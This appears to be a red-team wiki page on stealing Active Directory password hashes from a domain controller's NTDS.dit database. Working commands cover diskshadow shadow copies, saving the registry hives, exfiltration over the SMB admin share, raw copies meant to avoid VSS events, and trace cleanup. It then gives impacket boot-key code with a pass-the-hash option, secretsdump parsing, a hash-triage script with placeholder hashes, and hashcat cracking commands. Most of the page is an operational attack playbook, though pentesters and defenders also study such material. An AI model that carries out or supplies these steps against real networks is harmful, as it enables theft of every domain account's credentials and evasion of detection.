# NTDS

* <https://trustedsec.com/blog/exploring-ntds-dit-part-1-cracking-the-surface-with-dit-explorer>

## Shadow Disk

### Create via Diskshadow

Locate `diskshadow.exe` (it ships with Windows Server editions only, so check before relying on it):

```
cmd /c where /R C:\ diskshadow.exe
```

Create a shadow disk:

```
cd \Windows\Temp
powershell -c "Add-Content add_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content add_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content add_vol.txt 'set verbose on'"
powershell -c "Add-Content add_vol.txt 'begin backup'"
powershell -c "Add-Content add_vol.txt 'add volume c: alias DCROOT'"
powershell -c "Add-Content add_vol.txt 'create'"
powershell -c "Add-Content add_vol.txt 'expose %DCROOT% w:'"
powershell -c "Add-Content add_vol.txt 'end backup'"
cmd /c diskshadow.exe /s add_vol.txt
```

{% code title="add\_vol.txt" %}

```
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
begin backup
add volume c: alias DCROOT
create
expose %DCROOT% w:
end backup
```

{% endcode %}

### Exfiltrate over SMB

Stage the database and the registry hives in a directory reachable over SMB. `SYSTEM` is mandatory (the boot key derived from it decrypts the hashes); `SAM` and `SECURITY` are optional extras that add local accounts, cached domain credentials and LSA secrets:

```
cd \Windows\Temp
copy w:\Windows\NTDS\ntds.dit ntds.dit
cmd /c reg.exe save hklm\system system.hive
cmd /c reg.exe save hklm\sam sam.hive
cmd /c reg.exe save hklm\security security.hive
```

Pull the files over the `C$` admin share with the same privileged credentials (no extra share is needed):

```
$ smbclient.py MEGACORP/administrator:'Passw0rd!'@192.168.1.11
use C$
cd windows/temp
get ntds.dit
get system.hive
get sam.hive
get security.hive
```

### Clean Up

Remove the shadow copy. Note that `delete shadows volume c:` deletes every shadow copy of `C:`, including legitimate pre-existing ones; to remove only yours, take the shadow ID printed by `create` and use `delete shadows id <ID>` instead:

```
cd \Windows\Temp
powershell -c "Add-Content delete_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content delete_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content delete_vol.txt 'set verbose on'"
powershell -c "Add-Content delete_vol.txt 'unexpose w:'"
powershell -c "Add-Content delete_vol.txt 'delete shadows volume c:'"
powershell -c "Add-Content delete_vol.txt 'reset'"
cmd /c diskshadow.exe /s delete_vol.txt
```

{% code title="delete\_vol.txt" %}

```
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
unexpose w:
delete shadows volume c:
reset
```

{% endcode %}

Remove the staged files, the metadata cab and the diskshadow scripts:

```
cd \Windows\Temp
rm ntds.dit
rm system.hive
rm sam.hive
rm security.hive
rm C:\Windows\Temp\meta.cab
rm add_vol.txt
rm delete_vol.txt
```

## Raw NTDS.dit Copy

* <https://github.com/3gstudent/ntfsDump>
* <https://github.com/RedCursorSecurityConsulting/NTFSCopy>

Obtain a copy of NTDS.dit (the live file is held open exclusively by the NTDS service inside lsass; these tools read it straight from the raw NTFS volume, so no shadow copy and none of the associated VSS events are produced):

```
PS > Invoke-NTFSCopy C:\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit
```

Repair the copy first (a raw copy is in a dirty-shutdown state and most parsers refuse to open it), then parse on-site with [NtdsAudit](https://github.com/dionach/NtdsAudit/releases):

```
PS > esentutl.exe /p "C:\Windows\Temp\ntds.dit" /!10240 /8 /o
PS > reg.exe save HKLM\SYSTEM system.hive
PS > .\NtdsAudit.exe ntds.dit -s system.hive -p hashes.txt -u users.csv --dump-reversible cleartext.txt
```

Parse on-site with a Windows build of [secretsdump.exe](https://github.com/Qazeer/OffensivePythonPipeline/blob/main/binaries/impacket/secretsdump_windows.exe): the boot key is fetched remotely from the DC's registry with impacket's `RemoteOperations` (this starts the RemoteRegistry service if it is stopped) and then passed to secretsdump on the host:

```python
from binascii import hexlify
from impacket.smbconnection import SMBConnection
from impacket.examples.secretsdump import RemoteOperations

hostname = 'DC01.megacorp.local'
username = 'snovvcrash'
password = '<PASSWORD>'
nthash = '' if password else '<NTHASH>'  # pass-the-hash when no password is available
domain = hostname.split('.', 1)[1]

smbConn = SMBConnection(remoteName=hostname, remoteHost=hostname)
smbConn.login(user=username, password=password, domain=domain, nthash=nthash)

# enableRegistry() starts RemoteRegistry if needed; getBootKey() reads the
# JD/Skew1/GBG/Data class names under HKLM\SYSTEM\CurrentControlSet\Control\Lsa
remOps = RemoteOperations(smbConnection=smbConn, doKerberos=False)
remOps.enableRegistry()
bootKey = remOps.getBootKey()
print(hexlify(bootKey).decode())
remOps.finish()  # restores the RemoteRegistry service to its previous state

# Then, on the DC, feed the key to the Windows build of secretsdump:
# .\secretsdump.exe LOCAL -ntds C:\Windows\Temp\ntds.dit -bootkey <BOOTKEY>
```

## Parse NTDS.dit

Parse with [secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py). Pass `-user-status`, otherwise the `Status=Enabled` filter below matches nothing; the remaining filters drop the empty NT hash (`31d6c...`), machine accounts (`$`), Exchange system mailboxes (`{`/`}`, `HealthMailbox`) and duplicates, and `--username` makes hashcat accept the `user:hash` input (and print the user back with `--show`):

```
$ secretsdump.py [-pwd-last-set] -user-status [-history] -sam sam.hive -system system.hive -security security.hive -ntds ntds.dit LOCAL > ntds.txt
$ cat ntds.txt | grep -a aad3b | grep -i 'Status=Enabled' | grep -v 31d6c | grep -v -e '\$' -e '{' -e '}' -e HealthMailbox | awk -F: '{print $1":"$4}' | sort -u > ntds.in
$ hashcat -m 1000 -a 0 -w 3 -O --username --session=ntds -o ntds.out ntds.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
```
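The grep/awk pipeline above keys on the empty LM hash and on the `Status=` suffix, and silently keeps anything that does not look like it expected. The following is an added example, not code from this page or from impacket: a small Python triage of secretsdump's `-ntds` output that applies the same filters, keeps the RID and `pwdLastSet` for reporting, and also collects the `user:CLEARTEXT:password` lines that accounts with reversible encryption produce (see *Reversible Encryption* below). It assumes only the line formats secretsdump prints (`domain\user:rid:lm:nt:::` with optional `(pwdLastSet=...)` and `(status=...)` suffixes, and `domain\user:CLEARTEXT:password`); the sample dump and every hash value in it are constructed placeholders.

```python
import re

# Line formats assumed from secretsdump.py -ntds output (see lead-in):
#   domain\user:rid:lmhash:nthash::: [(pwdLastSet=...)] [(status=Enabled|Disabled)]
#   domain\user:CLEARTEXT:password          <- reversible-encryption accounts
NTDS_LINE = re.compile(
    r'^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::'
    r'(?:\s*\(pwdLastSet=(?P<pwdlastset>[^)]*)\))?'
    r'(?:\s*\(status=(?P<status>\w+)\))?\s*$'
)
CLEARTEXT_LINE = re.compile(r'^(?P<user>[^:]+):CLEARTEXT:(?P<password>.*)$')

EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'  # NT hash of the empty password


def is_noise(user):
    """Accounts not worth cracking: machine accounts and Exchange system
    mailboxes (SM_{guid}, HealthMailbox...), same filters as the grep pipeline."""
    name = user.rsplit('\\', 1)[-1]
    return name.endswith('$') or '{' in name or '}' in name or name.startswith('HealthMailbox')


def parse_secretsdump(text, require_enabled=True, keep_history=False):
    """Triage secretsdump output.

    Returns (hashes, cleartext): hashes maps user -> {'rid', 'nt', 'pwd_last_set', 'status'}
    for crackable accounts (first occurrence wins, like `sort -u`); cleartext maps
    user -> password for accounts stored with reversible encryption."""
    hashes, cleartext = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        m = NTDS_LINE.match(line)
        if m:
            user, nt, status = m['user'], m['nt'], m['status']
            if nt == EMPTY_NT or is_noise(user):
                continue
            if not keep_history and re.search(r'_history\d+$', user):
                continue
            # history entries carry no status suffix; only an explicit non-Enabled is dropped
            if require_enabled and status is not None and status.lower() != 'enabled':
                continue
            hashes.setdefault(user, {'rid': int(m['rid']), 'nt': nt,
                                     'pwd_last_set': m['pwdlastset'], 'status': status})
            continue
        m = CLEARTEXT_LINE.match(line)
        if m:
            cleartext[m['user']] = m['password']
    return hashes, cleartext


def to_hashcat(hashes):
    """user:nt lines for `hashcat -m 1000 --username ...`."""
    return '\n'.join(f"{user}:{rec['nt']}" for user, rec in hashes.items())


# Constructed sample dump: every hash value below is a placeholder, not real data.
SAMPLE = r"""[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
megacorp.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: (pwdLastSet=2024-01-15 09:12:33) (status=Enabled)
megacorp.local\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (pwdLastSet=never) (status=Disabled)
megacorp.local\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c9f6d6c3a0a9f1e8b6f3d2c1a0b9e8d7::: (pwdLastSet=2019-06-01 10:00:00) (status=Disabled)
megacorp.local\DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e::: (pwdLastSet=2024-03-01 00:00:00) (status=Enabled)
megacorp.local\j.doe:1104:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71::: (pwdLastSet=2024-02-20 14:05:00) (status=Enabled)
megacorp.local\j.doe_history0:1104:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
megacorp.local\svc_sql:1105:aad3b435b51404eeaad3b435b51404ee:a4f49c406510bdcab6824ee7c30fd852::: (pwdLastSet=2020-09-09 09:09:09) (status=Enabled)
megacorp.local\HealthMailbox1f2e3d4:1200:aad3b435b51404eeaad3b435b51404ee:7c1d23b5f09b6a2e4d8c9f0a1b2c3d4e::: (pwdLastSet=2024-01-01 00:00:00) (status=Enabled)
megacorp.local\old.user:1300:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42::: (pwdLastSet=2018-01-01 00:00:00) (status=Disabled)
[*] ClearText password from ntds.dit
megacorp.local\svc_sql:CLEARTEXT:Summer2020!
"""

if __name__ == '__main__':
    hashes, cleartext = parse_secretsdump(SAMPLE)
    print(to_hashcat(hashes))
    for user, password in cleartext.items():
        print(f'[reversible] {user}:{password}')
```

`parse_secretsdump(text, require_enabled=False, keep_history=True)` keeps disabled accounts and the `_historyN` entries produced by `-history`, which is what you want for a password-reuse or policy audit rather than a cracking run.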

Parse with [aesedb](https://github.com/skelsec/aesedb) (faster but less informative; takes either the boot key or the SYSTEM hive):

```
$ antdsparse <BOOTKEY> ntds.dit -o ntds.txt --progress
$ antdsparse system.hive ntds.dit -o ntds.txt --progress
```

Parse with ntdissector:

* <https://www.synacktiv.com/publications/introducing-ntdissector-a-swiss-army-knife-for-your-ntdsdit-files>
* <https://github.com/synacktiv/ntdissector>

### Reversible Encryption

* <https://adsecurity.org/?p=2053>
* <https://www.blackhillsinfosec.com/how-i-cracked-a-128-bit-password/>

Check if enabled globally:

* gpmc.msc > Default Domain Policy > *Computer Configuration* > *Policies* > *Windows Settings* > *Security Settings* > *Account Policies* > *Password Policy* > *Store passwords using reversible encryption* > *Enabled* ✔

Check if enabled for specific users (`userAccountControl` bit `0x80` = 128, `ENCRYPTED_TEXT_PWD_ALLOWED`):

```
PS > Get-ADUser -Filter {userAccountControl -band 128} -Properties userAccountControl | ft name,samAccountName,userAccountControl | tee users-revenc.txt
```

{% hint style="info" %}
When DCSyncing such users (or parsing ntds.dit offline), the password comes back in cleartext. The reversibly encrypted copy is only written at the next password change after the flag is set, so accounts whose current password predates the flag still yield only hashes.
{% endhint %}

## Tools

* <https://github.com/dionach/NtdsAudit>
* <https://github.com/MichaelGrafnetter/DSInternals>

